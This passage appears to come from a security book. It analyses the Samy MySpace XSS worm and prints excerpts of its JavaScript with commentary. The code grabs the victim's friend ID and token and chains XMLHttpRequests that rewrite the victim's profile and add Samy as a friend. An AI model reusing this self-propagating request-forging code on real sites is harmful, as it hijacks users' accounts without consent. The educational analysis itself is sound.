if (!friendIdParameter) {
getCoreVictimData(getHtmlBody());
}
// Now let's do the damage.
main();
}
Now the victim runs the main() function. Unfortunately, Samy did not design the
cleanest code. The main() function sets up some more variables just like some of the
global variables already set once, or if the redirect occurred, twice. The main() function
starts a chain of XMLHttpRequests that performs actions on the victim??™s behalf to change
the victim??™s profile page. The XMLHttpRequests are chained together by their callback
functions. Finally, main() makes one last request to add Samy to the victim??™s friends list.
It??™s not the cleanest design, but it works.
// This is Samy's closest attempt to a core routine. However, he uses many
// global function calls and horribly misuses XMLHttpRequest's callback to
// chain all of the requests together.
function main() {
// grab the victim's friendID. The "FriendID" and the "Mytoken" value are
// required for the worm to make requests on the Victim's behalf.
var friendId = getVictimsFriendId();
var url = '/index.cfm?fuseaction=user.viewProfile&friendID=' + friendId +
'&Mytoken=' + myTokenParameter;
xmlHttpRequest = getXMLObj();
// This request starts a chain of HTTP requests.
Pages:
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145